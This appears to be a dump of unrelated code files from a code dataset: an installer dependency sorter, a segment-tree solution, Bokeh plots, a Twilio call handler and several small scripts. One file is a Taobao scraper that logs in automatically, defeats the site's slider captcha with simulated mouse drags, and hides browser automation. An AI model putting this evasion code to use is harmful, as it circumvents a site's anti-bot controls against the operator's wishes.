list of an installer.\n\n Functions looks for two string patters:\n - # depends-on: \n - # satisfies: \n The former one defines dependencies of an installer, the latter defines\n dependencies this installer provides for others.\n\n Args:\n filename: An installer full name.\n\n Returns:\n A tuple, where the first element is True if the second element defines\n dependencies, and False if it defines satisfying list.\n \"\"\"\n depends = list()\n satisfies = list()\n with open(filename, 'r') as handler:\n dep_or_sat = True\n for line in handler.readlines():\n match = RE_DEPENDS.match(line)\n if not match:\n match = RE_SATISFIES.match(line)\n if not match:\n continue\n dep_or_sat = False\n\n names = match.groupdict().get('names', '')\n names = names.split(',')\n names = list(map(str.rstrip, names))\n names = list(map(str.lstrip, names))\n if dep_or_sat:\n depends.extend(names)\n else:\n satisfies.extend(names)\n\n return depends, satisfies\n\ndef find_topological_order(directory, target=None):\n graph = nx.DiGraph()\n\n # First, walk the installers and find real providers\n for root, _, files in os.walk(directory):\n if INSTALLER in files:\n name = os.path.basename(root)\n graph.add_node(name, transitive=False)\n\n # Second, find all dependees and dependers\n for root, _, files in os.walk(directory):\n if INSTALLER in files:\n name = os.path.basename(root)\n dependencies, satisfies = read_dependencies(os.path.join(root, INSTALLER))\n\n for dependence in dependencies:\n # If by now the dependence does not have a node it does not have a real\n # provider, so we assume it is transitive, i.d. provided by something\n # with different name\n if not graph.has_node(dependence):\n graph.add_node(dependence, transitive=True)\n\n # Set edge from dependee to its provider\n add_edge = functools.partial(lambda a,b: graph.add_edge(b,a), name)\n list(map(add_edge, dependencies))\n\n for sat in satisfies:\n # If there is something that tries to satisfy already satisfied\n # dependency we consider this an error\n if graph.has_node(sat) and len(list(graph.predecessors(sat))):\n print((\"{} tries to satisfy already existing installer {}\".format(name, sat)))\n return False, None\n graph.add_node(sat, transitive=True)\n\n # Set edge from transitive provider to its real provider\n add_edge = functools.partial(lambda a,b: graph.add_edge(a,b), name)\n list(map(add_edge, satisfies))\n\n # print graph.edges()\n # sys.exit(0)\n\n # Not all dependencies are provided by installers of the same name. 
By\n # collapsing the graph on these 'satisfying' dependencies we point a dependee\n # to a right installer.\n nodes_to_remove = list()\n for node, transitive in graph.nodes(data='transitive'):\n if not transitive:\n continue\n\n dependees = list(graph.successors(node))\n providers = list(graph.predecessors(node))\n assert len(providers) == 1, 'Must be exactly one provider, node: {}, dependees: {}, providers: {}'.format(node, dependees, providers)\n\n # Remove transitive node with all its edges\n nodes_to_remove.append(node)\n\n # Reconnect the graph\n add_edge = functools.partial(graph.add_edge, providers[0])\n list(map(add_edge, dependees))\n\n for node in nodes_to_remove:\n graph.remove_node(node)\n\n if not nx.is_directed_acyclic_graph(graph):\n print((\"Found dependency cycle: {}\".format(nx.find_cycle(graph))))\n return False, None\n\n if target:\n closure = set([target])\n while True:\n new = closure | set(sum(list(map(list, list(map(graph.predecessors, closure)))), []))\n if closure == new:\n break\n closure = new\n return True, list(nx.topological_sort(graph.subgraph(closure)))\n\n return True, list(nx.topological_sort(graph))\n\ndef create_menu():\n parser = argparse.ArgumentParser(prog='Topo')\n parser.add_argument('directory', metavar='DIR')\n parser.add_argument('--for', dest='target', default=None)\n return parser\n\ndef main():\n parser = create_menu()\n options = parser.parse_args()\n\n success, order = find_topological_order(options.directory, options.target)\n if not success:\n sys.exit(1)\n\n print((' '.join(order)))\n sys.exit(0)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"301181897","text":"import asyncio\nimport json\nimport pickle\nimport random\nimport re\nimport time\n\nimport aiohttp\nfrom bs4 import BeautifulSoup as bs\nfrom pyppeteer import launch\nfrom retrying import retry\nfrom setting import *\nfrom motor.motor_asyncio import AsyncIOMotorClient\nimport pymongo\n\n\n\n\n\nclass TBBrowser:\n\n def __init__(self, kwargs):\n for k, v in kwargs.items():\n self.__setattr__(k, v)\n self.browser = None\n self.spider_urls = []\n self.tmp_url = None\n self.password = None\n self.username = None\n self.login_url = None\n self.tmp_count = 0\n\n async def __create_browser(self, kwargs):\n self.browser = await launch(kwargs)\n\n @classmethod\n async def create_render(cls, kwargs):\n cls = cls(kwargs)\n browser_args = kwargs.get('browser_args', None)\n await cls.__create_browser(browser_args)\n return cls\n\n async def __base_page(self, url, timeout=15, delay=0):\n page = await self.browser.newPage()\n if self.page_jss:\n for js in self.page_jss:\n await page.evaluateOnNewDocument(js)\n if delay>0:\n await page.waitFor(delay)\n defaultViewport = self.defaultViewport or None\n await page.setViewport(defaultViewport)\n\n user_agent = self.user_agent or None\n await page.setUserAgent(user_agent)\n if self.cookies:\n for cookie in self.cookies:\n await page.setCookie(cookie)\n await page.goto(url)\n\n return page\n\n async def page(self, url, timeout=15, delay=0):\n return await self.__base_page(url, timeout, delay)\n\n async def close(self):\n try:\n await self.browser.close()\n except:\n pass\n\n async def spider(self, db_ip, db_port, db_name, db_collection, tiemout=15, delay=10):\n mongo = pymongo.MongoClient(db_ip, db_port)\n collection = mongo[db_name][db_collection]\n 
page = await self.page('https://www.taobao.com/', tiemout, delay)\n for url in self.spider_urls:\n item = None\n while not item:\n await page.goto(url)\n await page.waitFor(delay)\n html = await page.content()\n item = self.parse(html)\n print(item)\n collection.insert_one(item)\n await page.close()\n\n\n async def set_cookies(self, login_url, username, password):\n self.login_url = login_url\n self.username = username\n self.password = password\n if login_url is None and self.login_url:\n login_url = self.login_url\n username = self.username\n password = self.password\n page = await self.page(login_url)\n await page.waitForSelector(\"#J_QRCodeLogin > div.login-links > a.forget-pwd.J_Quick2Static\")\n await page.click(\"#J_QRCodeLogin > div.login-links > a.forget-pwd.J_Quick2Static\")\n await page.waitForSelector(\"#TPL_username_1\")\n await page.type(\"#TPL_username_1\", username, {'delay': random.randint(100,115)*0.5})\n await page.type(\"#TPL_password_1\", password, {'delay': random.randint(100,115)*0.7})\n\n await page.waitFor(5)\n try:\n slider = await page.Jeval('#nocaptcha', 'node => node.style')\n except:\n slider = None\n\n if slider:\n flag, page = await self.mouse_slide(page)\n if flag:\n await page.click(\"#J_SubmitStatic\")\n time.sleep(2)\n cookies = await page.cookies()\n self.cookies = cookies\n else:\n await page.click(\"#J_SubmitStatic\")\n await page.waitFor(20)\n await page.waitForNavigation()\n try:\n global error # check whether the error is a wrong username/password\n print(\"error_1:\", error)\n error = await page.Jeval('.error', 'node => node.textContent')\n print(\"error_2:\", error)\n except Exception as e:\n error = None\n finally:\n await page.waitFor(10)\n self.tmp_url = page.url\n\n if error:\n print('For account safety, please re-enter your credentials')\n # the program should exit here.\n\n else:\n print(page.url)\n cookies = await page.cookies()\n self.cookies = cookies\n\n\n q = await page.waitForSelector(\"#q\")\n if q:\n print('Login succeeded')\n cookies = await page.cookies()\n self.cookies = cookies\n await page.close()\n\n @staticmethod\n def retry_if_result_none(result):\n return result is None\n\n @retry(retry_on_result=retry_if_result_none)\n async def mouse_slide(self, page=None):\n await asyncio.sleep(2)\n try:\n await page.hover(\"#nc_1_n1z\")\n await page.mouse.down()\n await page.mouse.move(2000,0,{'delay': random.randint(1000,2000)})\n await page.mouse.up()\n except Exception as e:\n return None, page\n else:\n await asyncio.sleep(2)\n slide_again = await page.Jeval('.nc-lang-cnt', 'node => node.textContent')\n if slide_again != '验证通过': # the page's 'verification passed' text; keep the Chinese literal for matching\n return None, page\n else:\n return 1, page\n\n async def clear_webdriver(self, page):\n if self.page_jss:\n for js in self.page_jss:\n await page.evaluate(js)\n return page\n\n async def find_pages(self, search_url, keyword, sign='tmall'):\n try:\n page = await self.page(search_url)\n await page.waitFor(5)\n # await page.waitForNavigation()\n await page.type(\"#q\", keyword)\n await page.click(\"#J_SearchForm > button\")\n await page.waitForNavigation()\n await page.querySelector(\"#mainsrp-pager > div > div > div > div.total\")\n html = await page.content()\n total_pages = self.__total_pages(html)\n base_url = page.url\n await page.close()\n # return base_url, total_pages\n if sign == 'tmall':\n sign = \"&filter_tianmao=tmall\"\n else:\n sign = \"\"\n self.spider_urls = [base_url + f\"&s={44 * (i - 1)}\" + sign for i in range(1, total_pages + 1)]\n except Exception as e:\n print(e)\n time.sleep(1e4)\n\n def __total_pages(self, html):\n soup = bs(html, 'lxml')\n total_pages = soup.find(\"div\", attrs={'class':'total'}).text\n total_pages = re.findall(r\"\\d+\\.?\\d*\", total_pages)[0]\n return int(total_pages)\n\n def save_cookies(self):\n if self.cookies:\n cookies = {}\n for cookie in self.cookies:\n cookies.setdefault(cookie.get('name'), cookie.get('value'))\n with open('cookies.pk', 'wb') as f:\n pickle.dump(cookies, f)\n print('Cookies saved successfully!')\n\n def save_spider_urls(self):\n if self.spider_urls:\n with open(\"spider_urls.csv\", 'w') as f:\n for url in self.spider_urls:\n f.write(url+'\\n')\n print('Spider URLs updated')\n\n def parse(self, html):\n try:\n item = re.search(r'g_page_config = ({.*?});', html).group(1)\n item = json.loads(item)\n return item\n except:\n return None\n\n\n\n\nasync def main():\n browser = await TBBrowser.create_render(browser_args) # the class defined above is TBBrowser; bare 'Browser' was undefined\n await browser.set_cookies(**spider_args.get('login_info'))\n await browser.find_pages(**spider_args.get('search_info'))\n browser.save_cookies()\n browser.save_spider_urls()\n await browser.spider('localhost', 27017, 'taobao', 'yanshuang')\n await browser.close()\n\n\n\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n spider_urls = loop.run_until_complete(main())\n\n","sub_path":"core/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"225419002","text":"# Copyright 2013 Huawei Technologies Co.,LTD.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\n\nfrom rally.benchmark.scenarios.cinder import volumes\nfrom tests import test\n\n\nCINDER_VOLUMES = \"rally.benchmark.scenarios.cinder.volumes.CinderVolumes\"\n\n\nclass CinderServersTestCase(test.TestCase):\n\n @mock.patch(CINDER_VOLUMES + \".sleep_between\")\n @mock.patch(CINDER_VOLUMES + \"._delete_volume\")\n @mock.patch(CINDER_VOLUMES + \"._create_volume\")\n def _verify_create_and_delete_volume(self, mock_create, mock_delete,\n mock_sleep):\n fake_volume = object()\n mock_create.return_value = fake_volume\n volumes.CinderVolumes.create_and_delete_volume(1, 10, 20,\n fakearg=\"f\")\n\n mock_create.assert_called_once_with(1, fakearg=\"f\")\n mock_sleep.assert_called_once_with(10, 20)\n mock_delete.assert_called_once_with(fake_volume)\n\n def test_create_and_delete_volume(self):\n self._verify_create_and_delete_volume()\n","sub_path":"tests/benchmark/scenarios/cinder/test_volumes.py","file_name":"test_volumes.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317890101","text":"class STNode(object):\n def __init__(self, start, end):\n\n self.start = start\n self.end = end\n self.total = 0 \n self.lazy = 0\n\n self.left = None\n self.right = None\n \n\nclass SegmentTree(object):\n \"\"\"\n SegmentTree with lazy propagation\n - update(max) \n - query(max) \n \"\"\"\n def __init__(self, nums):\n # helper function to create the tree from input array\n def createTree(nums, l, r):\n if l == r:\n node = STNode(l, r)\n node.total = nums[l]\n return node\n elif l > r:\n return None\n else:\n mid = (l+r) // 2\n node = STNode(l, r)\n node.left = createTree(nums, l, mid)\n node.right = createTree(nums, mid+1, r)\n node.total = node.left.total + node.right.total\n return node\n self.root = createTree(nums,0,len(nums)-1)\n \n def update(self, i, j, val):\n # update range [i..j] lazily\n \n # helper function to update a value\n def updateVal(root, i, j, val):\n \n if root.lazy != 0: #this node is lazy\n root.total = max(root.lazy, root.total)\n if root.start != root.end:\n root.left.lazy = max(root.lazy, root.left.lazy)\n root.right.lazy = max(root.lazy, root.right.lazy)\n root.lazy = 0\n \n if j < i or root.start > j or root.end < i: #out of range, escape\n return root.total\n \n if i <= root.start and root.end <= j: #fully within \n root.total = max(val, root.total)\n if root.start != root.end:\n root.left.lazy = max(val, root.left.lazy)\n root.right.lazy = max(val, root.right.lazy)\n return root.total\n \n updateVal(root.left, i , j, val)\n updateVal(root.right, i , j, val)\n\n root.total = max(root.left.total,root.right.total) # merge updates\n return root.total\n\n return updateVal(self.root, i, j, val)\n\n def query(self, i, j):\n #helper functuion to calculate the range sum\n def rangeQuery(root, i, j):\n if j < i or root.start > j or root.end < i: #out of range, escape\n return -float(\"inf\")\n \n if root.lazy != 0: #this node is lazy\n root.total = max(root.lazy, root.total)\n if root.start != root.end:\n root.left.lazy = max(root.lazy, root.left.lazy)\n root.right.lazy = max(root.lazy, root.right.lazy)\n root.lazy = 0\n \n if i <= root.start and root.end <= j: #fully within \n return root.total\n \n mid = (root.start + root.end) // 2\n if j <= mid:\n return rangeQuery(root.left, i, j)\n elif i >= mid+1:\n return rangeQuery(root.right, i, j)\n else:\n return 
max(rangeQuery(root.left, i, mid), rangeQuery(root.right, mid+1, j))\n \n return rangeQuery(self.root, i, j)\n \n \nclass Solution(object):\n def fallingSquares(self, positions):\n \"\"\"\n :type positions: List[List[int]]\n :rtype: List[int]\n \"\"\"\n coords = set()\n for left, size in positions:\n coords.add(left)\n coords.add(left + size - 1)\n index = {x: i for i, x in enumerate(sorted(coords))}\n \n tree = SegmentTree( [0]*len(index) )\n best = 0\n ans = []\n for left, size in positions:\n L, R = index[left], index[left + size - 1]\n h = tree.query(L, R) + size\n tree.update(L, R, h)\n best = max(best, h)\n ans.append(best)\n\n return ans\n","sub_path":"Falling-Squares.py","file_name":"Falling-Squares.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"338339441","text":"import pandas as pd\nimport numpy as np\n\nfrom bokeh.io import output_file, show\nfrom bokeh.models import *\nfrom bokeh.plotting import figure\n\nfrom bokeh.transform import transform\n\n#Layout\nfrom bokeh.layouts import column\nfrom bokeh.embed import components\n#widgets\nfrom bokeh.models import Slider,HoverTool, CustomJS, Button, RadioButtonGroup\n#events\nfrom bokeh.events import ButtonClick\n\n\n#Node link\nimport networkx as nx\nfrom bokeh.models import Plot, Range1d, MultiLine, Circle, HoverTool, TapTool, BoxSelectTool\nfrom bokeh.models.graphs import from_networkx, NodesAndLinkedEdges, EdgesAndLinkedNodes\nfrom bokeh.palettes import Spectral4\n\n\n# DATA EXTRACTION (.csv -> dataframe)\n\ndef extractData(filePath):\n df_data = pd.read_csv(filePath, sep=';', index_col = False, na_filter=False, skip_blank_lines=False)\n df_data.set_index('Unnamed: 0', inplace=True)\n #set column and row names\n df_data.columns.name = 'AuthorX'\n df_data.index.name = \"AuthorY\"\n return df_data\n\ndef sliceData(df, size):\n df_data_test = df.iloc[0:size, 0:size]\n return df_data_test\n\ndef stackDataframe(df):\n df_stacked = pd.DataFrame(df.stack(), columns=['sim']).reset_index()\n return df_stacked\n\ndef toSource(df_stacked):\n source = ColumnDataSource(df_stacked)\n return source\n\ndef sortDataframe(df):\n df_sorted = df.sort_index(axis=0, level=None, ascending=True, inplace=False, kind='quicksort', na_position='last', sort_remaining=True, by=None)\n df_sorted = df_sorted.sort_index(axis=1, level=None, ascending=True, inplace=False, kind='quicksort', na_position='last', sort_remaining=True, by=None)\n return df_sorted\n\ndef generateRange(df):\n # Assure the order of the index and columns\n column_list = list(df.columns)\n index_list = list(df.index)\n index_list.reverse()\n return column_list, index_list\n\ndef createWidgets(df_similarity):\n\n #color mapper\n mapper = LinearColorMapper(palette= \"Viridis256\", low=df_similarity.sim.min(), high=df_similarity.sim.max())\n color_bar = ColorBar(color_mapper=mapper, location=(0, 0),\n ticker=BasicTicker(desired_num_ticks=10))\n \n return mapper, color_bar\ndef createMatrix(width, height, column_list_original, index_list_original, mapper, color_bar, source_normal):\n #Color mapper\n \n #Hover information\n hover = HoverTool()\n hover.tooltips = [\n (\"(Author1, Author2)\", \"(@AuthorX, @AuthorY)\"),\n (\"Similarity rate\", \"@sim\"),\n (\"Index\", \"@index\")\n ]\n #Basic interaction tools\n TOOLS = \"save,pan,box_zoom,reset,wheel_zoom\"\n #Graph grid and properties\n figure_matrix = figure(plot_width = width, plot_height=height, sizing_mode = \"scale_both\",\n 
x_range=column_list_original, y_range=index_list_original, #feeding columns and range\n toolbar_location=\"below\", tools=TOOLS, x_axis_location=\"above\")\n\n r = figure_matrix.rect(x='AuthorX', y='AuthorY', width=1, height=1, source=source_normal,#feeding x,y for each square\n line_color=None, fill_color=transform('sim', mapper))\n\n figure_matrix.tools.append(hover)\n figure_matrix.add_layout(color_bar, 'right')\n figure_matrix.axis.axis_line_color = None\n figure_matrix.axis.major_tick_line_color = None\n figure_matrix.axis.major_label_text_font_size = \"5pt\"\n figure_matrix.axis.major_label_standoff = 0\n figure_matrix.xaxis.major_label_orientation = np.pi/2\n return figure_matrix\n\n\n\n\n# ----------------------------------> Plotting the graph <---------------------------------- #\ndef nodeLink(df_data):\n plot_dimension = 800\n plot_range = (plot_dimension / 2)\n # TOOLS = \"hover,save,pan,box_zoom,reset,wheel_zoom, point_draw\"\n plot = Plot(x_range=Range1d(-plot_range, plot_range), y_range=Range1d(-plot_range, plot_range), output_backend=\"webgl\", \n width = plot_dimension, height = plot_dimension, sizing_mode = \"scale_both\")\n df_raw = pd.DataFrame(df_data.stack(), columns=['edge_weight'])\n df_refined = df_raw[df_raw['edge_weight'] > 0.3].reset_index()\n \n G = nx.from_pandas_dataframe(df_refined, 'AuthorY', 'AuthorX', 'edge_weight')\n \n graph = from_networkx(G, nx.circular_layout, scale=(plot_range * 0.8), center=(0,0))\n # formatting the dataframe into a stacked version that represents the start_node, end_node, and edge_weight\n # rendering the nodes in the graph\n graph.node_renderer.glyph = Circle(size=15, fill_color=Spectral4[0]) # Rendering every node as a circle\n graph.node_renderer.selection_glyph = Circle(size=15, fill_color=Spectral4[2]) # When you select the node, it become orange\n graph.node_renderer.hover_glyph = Circle(size=15, fill_color=Spectral4[1]) # When you hover the node, it become green\n\n # rendering the edges in the graph\n graph.edge_renderer.glyph = MultiLine(line_color=\"#CCCCCC\", line_alpha=0.8, line_width=5) # Rendering every edge as a line\n graph.edge_renderer.selection_glyph = MultiLine(line_color=Spectral4[2], line_width=5) # When you select a node, the connected egdes become orange\n graph.edge_renderer.hover_glyph = MultiLine(line_color=Spectral4[1], line_width=5) # When you hover a node, the connected edges become green\n\n graph.selection_policy = NodesAndLinkedEdges()\n graph.inspection_policy = NodesAndLinkedEdges() #EdgesAndLinkedNodes() (<-- does not work) #NodesAndLinkedEdges()\n\n plot.add_tools(HoverTool(tooltips=[(\"Name\", \"@index\")]), TapTool(), BoxSelectTool())\n plot.renderers.append(graph)\n\n return plot\n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158455913","text":"\n\n#calss header\nclass _SPOTLIGHT():\n\tdef __init__(self,): \n\t\tself.name = \"SPOTLIGHT\"\n\t\tself.definitions = [u'a lamp whose beam can be directed, or a circle of light produced by such a lamp', u'(of a person) receiving a lot of public attention: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_spotlight.py","file_name":"_spotlight.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"441713941","text":"import logging\nimport random\n\nimport twilio.twiml\nimport webapp2\nfrom twilio.util import RequestValidator\n\nimport response_strings\nimport strings\nfrom models.account import Account\nfrom models.response import get_response\n\n\nclass CallHandler(webapp2.RequestHandler):\n def get(self):\n\n # Validate that request came from Twilio service.\n validator = RequestValidator(strings.AUTH_TOKEN)\n url = self.request.url\n url = url.replace(\"http\", \"https\")\n signature = self.request.headers.get(\"X-Twilio-Signature\", \"\")\n\n if not validator.validate(url, {}, signature):\n logging.warn(\"Request did not come from Twilio.\")\n self.response.status = 403\n return\n\n phone = self.request.get(\"From\", None)\n account = Account.query().filter(Account.phone == phone).get()\n\n # Sending messages separately, send empty TwiML for now.\n twiml = twilio.twiml.Response()\n\n response = get_response(response_strings.CALL_HELLO, response_strings.VAR_NAME)\n\n if account and account.first:\n response = response.replace(response_strings.VAR_NAME, account.first)\n else:\n response = response.replace(response_strings.VAR_NAME, \"\")\n\n twiml.addSay(response)\n\n tracks = [\n \"better_things\",\n \"dare\",\n \"enchanted\",\n \"makes_me_wonder\",\n \"the_reeling\",\n \"viva_la_vida\"\n ]\n\n track_num = random.randint(0, len(tracks) - 1)\n\n twiml.addPlay(self.request.application_url + \"/static/mp3/\" + tracks[track_num] + \".mp3\")\n\n response = get_response(response_strings.CALL_GOODBYE)\n\n twiml.addSay(response)\n twiml.addHangup()\n\n self.response.write(twiml)\n","sub_path":"controllers/call_handler.py","file_name":"call_handler.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277532316","text":"# -*- coding:utf-8 -*-\nclass Solution:\n # 返回[a,b] 其中ab是出现一次的两个数字\n def FindNumsAppearOnce(self, array):\n # write code here\n diff = 0\n for num in array:\n diff ^= num\n rightBit = self.RightBit(diff)\n num1, num2 = 0, 0\n for num in array:\n if num & rightBit == rightBit:\n num1 ^= num\n else:\n num2 ^= num\n return [num1, num2]\n\n def RightBit(self, num):\n if not num:\n return 0\n rightBit = 1\n while num & rightBit != rightBit:\n rightBit = rightBit << 1\n return rightBit\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.FindNumsAppearOnce([121, 23, 23, 421, 33, 33]))\n","sub_path":"practice/FindNumsAppearOnce.py","file_name":"FindNumsAppearOnce.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"6185765","text":"import sys\nimport os\nimport yaml\nimport logging\nimport types\n\nfrom .misc import Config\n\n\"\"\"\nThe common.py script is where all globally accessable variables and instances\nare set up.\n\"\"\"\n\n\nconf = Config()\n\nclass Log():\n\tdef __init__(self, config = {}):\n\t\tpass\n\n\tdef logger(self):\n\t\tlogger = logging.getLogger('app')\n\t\thdlr = logging.FileHandler(conf.app_dir() + '/data/log/error.log', mode='a+')\n\t\tformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\t\thdlr.setFormatter(formatter)\n\t\tlogger.addHandler(hdlr)\n\t\tlogger.setLevel(logging.DEBUG)\n\t\treturn 
logger\n\n\tdef bizz(self):\n\t\tlogger = logging.getLogger('biz')\n\t\thdlr = logging.FileHandler(conf.app_dir() + '/data/log/bizz.log', mode='a+')\n\t\tformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\t\thdlr.setFormatter(formatter)\n\t\tlogger.addHandler(hdlr)\n\t\tlogger.setLevel(logging.DEBUG)\n\t\treturn logger\n\nlogger = Log({}).logger()\nbizz = Log({}).bizz()\n","sub_path":"kpapp/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200926252","text":"# -*- coding: utf-8 -*-\n'''\nTask 12.2\n\n\nThe check_ip_addresses function from task 12.1 accepts only a list of addresses,\nbut it would be convenient to be able to specify addresses as a range, for example 192.168.100.1-10.\n\nIn this task you need to create a convert_ranges_to_ip_list function\nthat converts a list of IP addresses in different formats into a list where every IP address is listed separately.\n\nThe function expects a list of IP addresses and/or IP address ranges as its argument.\n\nList elements may be in the format:\n* 10.1.1.1\n* 10.1.1.1-10.1.1.10\n* 10.1.1.1-10\n\nIf an address is given as a range, the range must be expanded into individual addresses, including the last address of the range.\nTo simplify the task, you may assume that only the last octet of the address changes within a range.\n\nThe function returns a list of IP addresses.\n\n\nFor example, if convert_ranges_to_ip_list is given this list:\n['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132']\n\nthe function should return this list:\n['8.8.4.4', '1.1.1.1', '1.1.1.2', '1.1.1.3', '172.21.41.128',\n '172.21.41.129', '172.21.41.130', '172.21.41.131', '172.21.41.132']\n\n'''\n\nimport subprocess\nimport argparse\nfrom task_12_1 import check_ip_addresses\nimport ipaddress\n\ndef count_integer(a, b):\n    \"\"\"\n    This function counts the number of objects between variables a and b.\n    \"\"\"\n    x = 0\n    status = True\n    while status:\n        if a == b:\n            x = x + 1\n            status = False\n        else:\n            a = a + 1\n            x = x + 1\n    return x\n\nif __name__ == \"__main__\":\n    # parse the command-line argument\n    parser = argparse.ArgumentParser(description='Ping script')\n    parser.add_argument('ip_list', action='store', help='Enter ip-address-list just like: 192.168.1.1-10 or 192.168.1.1-192.168.1.10 or 192.168.1.1')\n    args = parser.parse_args()\n    yes = []\n    no = []\n\n    if '-' in args.ip_list:\n        lists1, lists2 = args.ip_list.split('-')\n        lis1 = int(lists1.split('.')[-1])\n        lis2 = int(lists2.split('.')[-1])\n        start = ipaddress.ip_address(lists1)\n        x = count_integer(lis1, lis2)\n        for line in range(x):\n            status = check_ip_addresses(start)\n            if status:\n                yes.append(start)\n                start = start + 1\n            else:\n                no.append(start)\n                start = start + 1\n    else:\n        status = check_ip_addresses(args.ip_list)\n        start = ipaddress.ip_address(args.ip_list)\n        if status:\n            yes.append(start)\n        else:\n            no.append(start)\n    print('Available address list: ',yes)\n    print('Unavailable address list: ', no)\n\"\"\"\n17:56 $ ./task_12_2.py 192.168.1.1-3\nI'm ping 192.168.1.1 right now, wait.\nI'm ping 192.168.1.2 right now, wait.\nI'm ping 192.168.1.3 right now, wait.\nAvailable address list: [IPv4Address('192.168.1.1')]\nUnavailable address list: [IPv4Address('192.168.1.2'), IPv4Address('192.168.1.3')]\n\"\"\"\n","sub_path":"exercises/12_useful_modules/task_12_2.py","file_name":"task_12_2.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
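# --- Illustrative sketch (not part of any dataset record above or below) ---
# The task_12_2.py docstring above describes a convert_ranges_to_ip_list
# function, but the script itself never defines one. Below is a minimal sketch
# of one possible implementation, assuming (as the task text allows) that only
# the last octet changes within a range; this helper is hypothetical and not
# taken from the original exercise solution.
import ipaddress

def convert_ranges_to_ip_list(ip_addresses):
    """Expand '10.1.1.1-10' / '10.1.1.1-10.1.1.10' style ranges into single IPs."""
    result = []
    for item in ip_addresses:
        if '-' not in item:
            result.append(item)
            continue
        start, end = item.split('-')
        if '.' not in end:
            # short form such as '10.1.1.1-10': rebuild the full end address
            end = start.rsplit('.', 1)[0] + '.' + end
        current, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
        while current <= last:
            result.append(str(current))
            current += 1  # IPv4Address supports integer arithmetic
    return result

# Example: convert_ranges_to_ip_list(['8.8.4.4', '1.1.1.1-3'])
# returns ['8.8.4.4', '1.1.1.1', '1.1.1.2', '1.1.1.3']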
+{"seq_id":"166560821","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport plugins\nimport psutil\n\nclass Plugin(plugins.BasePlugin):\n __name__ = 'temp'\n\n def run(self, *unused):\n '''\n expirimental plugin used to collect temperature from system sensors\n plugin can be tested by running nixstatsagent test temp\n '''\n data = {}\n\n if not hasattr(psutil, \"sensors_temperatures\"):\n return \"platform not supported\"\n\n try:\n temps = psutil.sensors_temperatures()\n except:\n return \"can't read any temperature\"\n\n for device, temp in temps.items():\n for value in temp:\n type = value[0]\n if value[0] == '':\n type = device\n data[type] = value[1]\n return data\n\n\nif __name__ == '__main__':\n Plugin().execute()\n","sub_path":"nixstatsagent/plugins/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243793747","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nx = int(input())\ntemp = 0\nfor i in [10,5,1]:\n if x>=i:\n change = x//i\n temp += change\n x = x%i\n if x == 0:\n print(temp)\n quit()","sub_path":"Algorithmic Toolbox/Week 3- Greedy Algorithms/money_change.py","file_name":"money_change.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63296502","text":"from .ClPokemon import *\n\nclass Attack(Pokemon):\n def __init__(self, q):\n super().__init__(q)\n self.attack=''\n self.superattack=''\n \n def enter(self):\n note = [['name', self.name],\n ['poktype', self.poktype],\n ['cp', self.cp],\n ['hp', self.hp],\n ['attack', self.attack],\n ['superattack', self.superattack]]\n return note\n","sub_path":"st16/ClAttack.py","file_name":"ClAttack.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272906279","text":"\"\"\"\nRuns the ichimoku strategy over the market data\n\"\"\"\n\nimport structlog\n\n\nfrom strategies.strategy_utils import Utils\n\n\nclass IchimokuCloud():\n \"\"\"\n Runs the ichimoku strategy over the market data\n \"\"\"\n def __init__(self):\n self.logger = structlog.get_logger()\n self.utils = Utils()\n\n def get_kijunsen(self, historical_data):\n 